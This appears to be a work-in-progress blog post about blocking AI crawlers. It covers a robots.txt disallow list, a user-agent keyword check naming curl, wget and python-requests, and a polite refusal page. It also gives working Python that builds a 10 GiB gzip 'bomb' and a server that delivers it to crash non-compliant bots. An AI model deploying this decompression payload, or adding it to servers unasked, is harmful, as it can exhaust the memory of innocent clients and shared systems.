NOTE: This is still a work in progress {class="notification is-info is-light"}
After years of allowing them, I now want to block the majority of crawler bots. Roughly half of all traffic on websites comes from bots; that never really bothered me before, but the wave of AI crawlers scraping content has changed my mind.
Using Robots.txt to block them
Robots.txt is a file that well-behaved bots read to find out which parts of a site they are allowed to crawl; you can use it to disallow specific crawlers entirely.
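As an illustration, here is a minimal robots.txt that disallows a few well-known AI crawlers by their published user-agent tokens. The list changes often, so treat it as a starting point; the disallow-ai repo linked at the bottom maintains a much fuller one.

```txt
# Block some well-known AI training crawlers (illustrative, not exhaustive)
User-agent: GPTBot
User-agent: ClaudeBot
User-agent: CCBot
User-agent: Google-Extended
User-agent: PerplexityBot
Disallow: /

# Everyone else may crawl normally
User-agent: *
Allow: /
```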
How to detect bots and crawlers?
There are plenty of such bots, and they are hard to detect since they can spoof their user agent. Some don't bother and keep the default user agent of their HTTP library, which you can easily detect and block. For the rest, an easy countermeasure is the gzip bomb described below.
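A minimal sketch of that user-agent check in Python: flag requests whose User-Agent header is missing, is a stock HTTP-library default, or names a known AI crawler. The substrings below are illustrative, not an exhaustive list.

```python
# Substrings found in default library user agents and known AI crawlers.
# Illustrative only; real-world lists need regular updating.
SUSPICIOUS_UA_SUBSTRINGS = (
    "python-requests", "go-http-client", "curl", "wget",
    "gptbot", "claudebot", "ccbot", "bytespider",
)

def looks_like_bot(user_agent):
    """Return True if the request smells like a script or crawler."""
    if not user_agent:              # many scripts send no User-Agent at all
        return True
    ua = user_agent.lower()
    return any(s in ua for s in SUSPICIOUS_UA_SUBSTRINGS)

# Example: looks_like_bot("python-requests/2.31.0") -> True
```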
Providing a message
Maybe don't block curl/wget requests outright, as someone might genuinely be trying to read your website through curl. The problem is that curl and wget can also be used for automation, so there is no clean way to tell the two apart.
Instead, serve a short message saying that the page is blocked for automated clients and invite the reader to open it in a real browser.
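As a sketch of that idea, a tiny WSGI app could answer suspected bots with a plain-text notice and serve everyone else the real page. The `looks_like_bot()` here is a one-line stand-in for the user-agent check sketched earlier, and the wording of the notice is just an example.

```python
from wsgiref.simple_server import make_server

def looks_like_bot(ua):
    # Stand-in for the fuller user-agent check above.
    return any(s in ua.lower() for s in ("curl", "wget", "python-requests"))

NOTICE = (b"This page is not served to automated clients. "
          b"If you are a human, please open it in a regular browser.")

def app(environ, start_response):
    ua = environ.get("HTTP_USER_AGENT", "")
    if looks_like_bot(ua):
        # Polite refusal instead of a silent block or a gzip bomb.
        start_response("403 Forbidden", [("Content-Type", "text/plain")])
        return [NOTICE]
    start_response("200 OK", [("Content-Type", "text/html")])
    return [b"<p>The real page goes here.</p>"]

if __name__ == "__main__":
    make_server("0.0.0.0", 8000, app).serve_forever()
```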
If you do block, make sure you keep some alternative way for people to find you on the internet, or allow a few crawlers like Google to keep indexing your website.
Gzip Bomb Them
If bots won't follow robots.txt, too bad for them: you have a surprise waiting.
You can create a 10 GB or even a 1 TB (terabyte) file that contains nothing but zeroes and gzip it. A single gzip pass already shrinks 10 GB of zeroes down to roughly 10 MB, and running gzip over the result a few more times gets it to somewhere between 5 and 50 KB (though most clients only unwrap one layer of Content-Encoding, so a single pass is usually the practical choice). When a crawler fetches that page, especially through a headless browser, it spends huge amounts of RAM and CPU inflating the tiny download back into the full 10 GB/1 TB of zeroes, which usually makes it run out of memory and crash. This will teach them not to mess with your website if they can't follow basic instructions.
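Here is a minimal sketch of how the payload could be generated in Python. The 10 GiB size and the `bomb.gz` filename are arbitrary choices, and the zeroes are streamed through gzip so the script itself never needs gigabytes of RAM.

```python
import gzip

CHUNK = 1024 * 1024          # write zeroes 1 MiB at a time
TOTAL = 10 * 1024 ** 3       # 10 GiB of zeroes before compression

def make_gzip_bomb(path="bomb.gz"):
    """Stream TOTAL bytes of zeroes through gzip; output is roughly 10 MB."""
    zeroes = b"\x00" * CHUNK
    written = 0
    with gzip.open(path, "wb", compresslevel=9) as f:
        while written < TOTAL:
            f.write(zeroes)
            written += CHUNK

if __name__ == "__main__":
    make_gzip_bomb()
```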
Why gzip? It's well supported: virtually every browser and HTTP client advertises gzip support and will transparently decompress the response.
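To illustrate the delivery side, here is a sketch of a tiny server that sends the pre-compressed file with a `Content-Encoding: gzip` header, so any client that advertises gzip support will try to inflate it. The port and the `bomb.gz` path are placeholders for whatever your setup uses.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
import os

BOMB = "bomb.gz"  # file produced by the sketch above

class BombHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Claim the body is ordinary gzip-encoded HTML; the client
        # decompresses it and ends up holding gigabytes of zeroes.
        # In practice you would only do this on a trap URL that
        # robots.txt disallows, so obedient crawlers never hit it.
        self.send_response(200)
        self.send_header("Content-Encoding", "gzip")
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(os.path.getsize(BOMB)))
        self.end_headers()
        with open(BOMB, "rb") as f:
            self.wfile.write(f.read())

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), BombHandler).serve_forever()
```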
Various resources
https://www.theverge.com/24315071/ai-training-chatgpt-gemini-copilot-how-to
https://github.com/dmitrizzle/disallow-ai/blob/main/src/robots.txt